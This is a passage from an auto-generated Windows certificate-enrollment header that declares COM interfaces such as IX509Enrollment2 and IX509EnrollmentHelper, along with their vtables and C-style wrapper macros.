            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Enrollment2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromRequest )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateRequest )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509Enrollment2 * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *CreatePFX )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Response )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateDescription )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateDescription )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAConfigString )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse2 )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerUrl,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestIdString )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509Enrollment2Vtbl;

    interface IX509Enrollment2
    {
        CONST_VTBL struct IX509Enrollment2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Enrollment2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Enrollment2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Enrollment2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Enrollment2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Enrollment2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Enrollment2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Enrollment2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Enrollment2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509Enrollment2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509Enrollment2_InitializeFromRequest(This,pRequest)	\
    ( (This)->lpVtbl -> InitializeFromRequest(This,pRequest) ) 

#define IX509Enrollment2_CreateRequest(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequest(This,Encoding,pValue) ) 

#define IX509Enrollment2_Enroll(This)	\
    ( (This)->lpVtbl -> Enroll(This) ) 

#define IX509Enrollment2_InstallResponse(This,Restrictions,strResponse,Encoding,strPassword)	\
    ( (This)->lpVtbl -> InstallResponse(This,Restrictions,strResponse,Encoding,strPassword) ) 

#define IX509Enrollment2_CreatePFX(This,strPassword,ExportOptions,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreatePFX(This,strPassword,ExportOptions,Encoding,pValue) ) 

#define IX509Enrollment2_get_Request(This,pValue)	\
    ( (This)->lpVtbl -> get_Request(This,pValue) ) 

#define IX509Enrollment2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509Enrollment2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509Enrollment2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509Enrollment2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509Enrollment2_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509Enrollment2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509Enrollment2_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509Enrollment2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509Enrollment2_get_Response(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Response(This,Encoding,pValue) ) 

#define IX509Enrollment2_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509Enrollment2_put_CertificateFriendlyName(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,strValue) ) 

#define IX509Enrollment2_get_CertificateDescription(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateDescription(This,pValue) ) 

#define IX509Enrollment2_put_CertificateDescription(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateDescription(This,strValue) ) 

#define IX509Enrollment2_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define IX509Enrollment2_get_CAConfigString(This,pValue)	\
    ( (This)->lpVtbl -> get_CAConfigString(This,pValue) ) 


#define IX509Enrollment2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509Enrollment2_InstallResponse2(This,Restrictions,strResponse,Encoding,strPassword,strEnrollmentPolicyServerUrl,strEnrollmentPolicyServerID,EnrollmentPolicyServerFlags,authFlags)	\
    ( (This)->lpVtbl -> InstallResponse2(This,Restrictions,strResponse,Encoding,strPassword,strEnrollmentPolicyServerUrl,strEnrollmentPolicyServerID,EnrollmentPolicyServerFlags,authFlags) ) 

#define IX509Enrollment2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509Enrollment2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509Enrollment2_get_RequestIdString(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestIdString(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Enrollment2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0088 */
/* [local] */ 

typedef 
enum WebEnrollmentFlags
    {
        EnrollPrompt	= 0x1
    } 	WebEnrollmentFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0088_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0088_v0_0_s_ifspec;

#ifndef __IX509EnrollmentHelper_INTERFACE_DEFINED__
#define __IX509EnrollmentHelper_INTERFACE_DEFINED__

/* interface IX509EnrollmentHelper */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentHelper;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab351-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentHelper : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddPolicyServer( 
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddEnrollmentServer( 
            /* [in] */ __RPC__in BSTR strEnrollmentServerURI,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Enroll( 
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strTemplateName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ WebEnrollmentFlags enrollFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentHelperVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentHelper * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentHelper * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentHelper * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddPolicyServer )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddEnrollmentServer )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentServerURI,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strTemplateName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ WebEnrollmentFlags enrollFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        END_INTERFACE
    } IX509EnrollmentHelperVtbl;

    interface IX509EnrollmentHelper
    {
        CONST_VTBL struct IX509EnrollmentHelperVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentHelper_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentHelper_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentHelper_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentHelper_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentHelper_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentHelper_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentHelper_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentHelper_AddPolicyServer(This,strEnrollmentPolicyServerURI,strEnrollmentPolicyID,EnrollmentPolicyServerFlags,authFlags,strCredential,strPassword)	\
    ( (This)->lpVtbl -> AddPolicyServer(This,strEnrollmentPolicyServerURI,strEnrollmentPolicyID,EnrollmentPolicyServerFlags,authFlags,strCredential,strPassword) ) 

#define IX509EnrollmentHelper_AddEnrollmentServer(This,strEnrollmentServerURI,authFlags,strCredential,strPassword)	\
    ( (This)->lpVtbl -> AddEnrollmentServer(This,strEnrollmentServerURI,authFlags,strCredential,strPassword) ) 

#define IX509EnrollmentHelper_Enroll(This,strEnrollmentPolicyServerURI,strTemplateName,Encoding,enrollFlags,pstrCertificate)	\
    ( (This)->lpVtbl -> Enroll(This,strEnrollmentPolicyServerURI,strTemplateName,Encoding,enrollFlags,pstrCertificate) ) 

#define IX509EnrollmentHelper_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentHelper_INTERFACE_DEFINED__ */


#ifndef __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__
#define __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__

/* interface IX509EnrollmentWebClassFactory */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentWebClassFactory;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab349-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentWebClassFactory : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateObject( 
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IUnknown **ppIUnknown) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentWebClassFactoryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentWebClassFactory * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentWebClassFactory * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentWebClassFactory * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateObject )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IUnknown **ppIUnknown);
        
        END_INTERFACE
    } IX509EnrollmentWebClassFactoryVtbl;

    interface IX509EnrollmentWebClassFactory
    {
        CONST_VTBL struct IX509EnrollmentWebClassFactoryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentWebClassFactory_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentWebClassFactory_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentWebClassFactory_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentWebClassFactory_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentWebClassFactory_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentWebClassFactory_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentWebClassFactory_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentWebClassFactory_CreateObject(This,strProgID,ppIUnknown)	\
    ( (This)->lpVtbl -> CreateObject(This,strProgID,ppIUnknown) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__ */


#ifndef __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__
#define __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__

/* interface IX509MachineEnrollmentFactory */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509MachineEnrollmentFactory;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab352-217d-11da-b2a4-000e7bbb2b09")
    IX509MachineEnrollmentFactory : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateObject( 
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentHelper **ppIHelper) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509MachineEnrollmentFactoryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509MachineEnrollmentFactory * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509MachineEnrollmentFactory * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509MachineEnrollmentFactory * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateObject )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentHelper **ppIHelper);
        
        END_INTERFACE
    } IX509MachineEnrollmentFactoryVtbl;

    interface IX509MachineEnrollmentFactory
    {
        CONST_VTBL struct IX509MachineEnrollmentFactoryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509MachineEnrollmentFactory_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509MachineEnrollmentFactory_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509MachineEnrollmentFactory_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509MachineEnrollmentFactory_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509MachineEnrollmentFactory_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509MachineEnrollmentFactory_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

